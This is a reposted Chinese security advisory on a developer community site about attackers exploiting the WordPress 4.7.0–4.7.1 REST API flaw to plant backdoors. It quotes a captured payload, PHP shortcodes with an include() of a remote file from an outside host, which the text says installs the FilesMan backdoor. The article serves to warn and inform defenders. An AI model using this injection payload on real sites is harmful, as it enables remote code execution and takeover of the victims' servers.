开发者社区> 寒凝雪> 正文
阿里云
为了无法计算的价值
打开APP
阿里云APP内打开

高危漏洞预警:WordPress REST API 被利用安装后门

简介:
+关注继续查看

近期攻击者发现了一种利用WordPress REST API漏洞的方法,并通过安装隐藏的后门来获得对受害者服务器的完全访问。

1月26日,WordPress团队发布了WordPress 4.7.2,其中包含一个解决WordPress REST API中的漏洞的秘密修复,影响到REST API——来自Sucuri的安全研究人员最先发现该漏洞。未经授权的攻击者利用该漏洞可注入恶意内容,以及进行提权,对文章、页面等内容进行修改。REST API是最近添加到WordPress 4.7.0并默认启用的。

漏洞发现者Sucuri介绍,这个缺陷影响WordPress 4.7.0和4.7.1,并允许攻击者制作恶意HTTP请求,当发送到一个WordPress网站将允许黑客绕过身份验证方法,并更改博客帖子的标题和内容和静态 页面。

简单来说,攻击者发现了通过REST API缺陷将自己的PHP代码发送到WordPress站点的方法,直到那时它才被用于改变原有的文本。

content:"[insert_php] include('http[:]//acommeamour.fr/tmp/xx.php'); [/insert_php]
[php] include('http[:]//acommeamour.fr/tmp/xx.php'); [/php]",
"id":"61a"}

在实时攻击中看到的上述源代码片段将告诉WordPress引擎在每次用户访问该特定页面时执行以下PHP命令,如果黑客插入木马或其他恶意脚本,影响将会扩大。

include('http[:]//acommeamour.fr/tmp/xx.php');

这行PHP代码将在受害者的站点上包含一个远程PHP文件,它将在WordPress / wp-content / uploads /文件夹中下载并安装FilesMan PHP后门。

在将其HTTP请求发送到站点的WordPress REST API后,攻击者只需访问一次损坏的页面,然后访问后门并接管受害者的底层服务器。

鉴于WordPress使用的广泛性,该漏洞的影响还是比较大的。使用 WordPress REST API 是简便高效的通过 JSON 格式传输数据访问或控制 WordPress 站点内容的方法。API 提供了对用户、文章、分类等不同功能的控制,也可以通过 API 检索或修改文章。Wordpress REST API 插件在 4.70 集成到 WordPress 中,由于权限控制失效导致内容注入或修改。WordPress开发团队已经与Sucuri配合在最新的4.7.2版本中修复了该漏洞。

本文来自开源中国社区 [http://www.oschina.net]

版权声明:本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。

相关文章
0Spirng Boot2.5 开发实战 REST API 模拟淘宝订单接口|学习笔记
快速学习0Spirng Boot2.5 开发实战 REST API 模拟淘宝订单接口。
0 0
《Java Spring Boot开发实战系列课程【第15讲】:Spring Boot 2.0 API与Spring REST Docs实战》电子版地址
Java Spring Boot开发实战系列课程【第15讲】:Spring Boot 2.0 API与Spring REST Docs实战
0 0
YARN REST API 总结
YARN REST API 总结
0 0
【Django | 开发】 Rest Framework 开放API
【Django | 开发】 Rest Framework 开放API
0 0
9个REST API设计的基本准则
通常情况下,在项目开发过程中涉及的API设计是采用REST API的模式,但并没有制定一个严格的、可理解的、可扩展的规范,从长远来看,随着项目的不断迭代,特别的在赶工期的情况下,REST API就会出现偏移。因此建议在项目初期就建立严格的API设计规范。
0 0
GraphQL与REST:两种API架构
在过去十年中,REST已经成为Web API的设计标准,提供了一些很棒的想法,例如无状态服务器和对资源的结构化访问,可以去这里详细了解REST API。但是,REST API已经显示出太不灵活,无法满足访问客户端快速变化的需求。
0 0
什么是RESTful,REST api设计时应该遵守什么样的规则?
REST是一种软件架构风格,用于 Web 架构的设计,任何遵循 REST 设计原则的 API都被称为 RESTful,在开发初期,开发者需要花费大量的时间去设计接口,这些接口一般都是遵循RESTful风格,力争接口简单、易懂。
0 0
评测最火的 11 款 REST API GUI
尽管 RESTful Web 服务具有可扩展性且易于维护,但是手动进行 API 测试操作复杂,因此我们需要选择一些好用的客户端来帮助我们测试 REST API。这里,码匠为大家罗列了 11 款最火的用于 REST API 测试的客户端工具。
0 0
浅谈 REST API 身份验证的四种方法
在平时开发中,接口验证是必须的,不然所有人都能请求你的接口,会带来严重的后果,接口验证一般有四种方法
0 0
WordPress Rest API 最细接口详解
通过接口的测试和了解,wp的主要功能包括:用户的登录注册、获取文章分类、获取文章详情、新增|修改|删除文章、评论文章、点赞文章和评论。 那么可以实现移动端资讯类app的基本应用。如果个人|团队想构建一个比较简单的资讯类项目的话,应用wp框架是一个比较不错的选择。
0 0
+关注
文章
问答
文章排行榜
最热
最新
相关电子书
更多
CUDA Math API
立即下载
Java Spring Boot开发实战系列课程【第15讲】:Spring Boot 2.0 API与Spring REST Docs实战
立即下载
重保场景及API安全指南
立即下载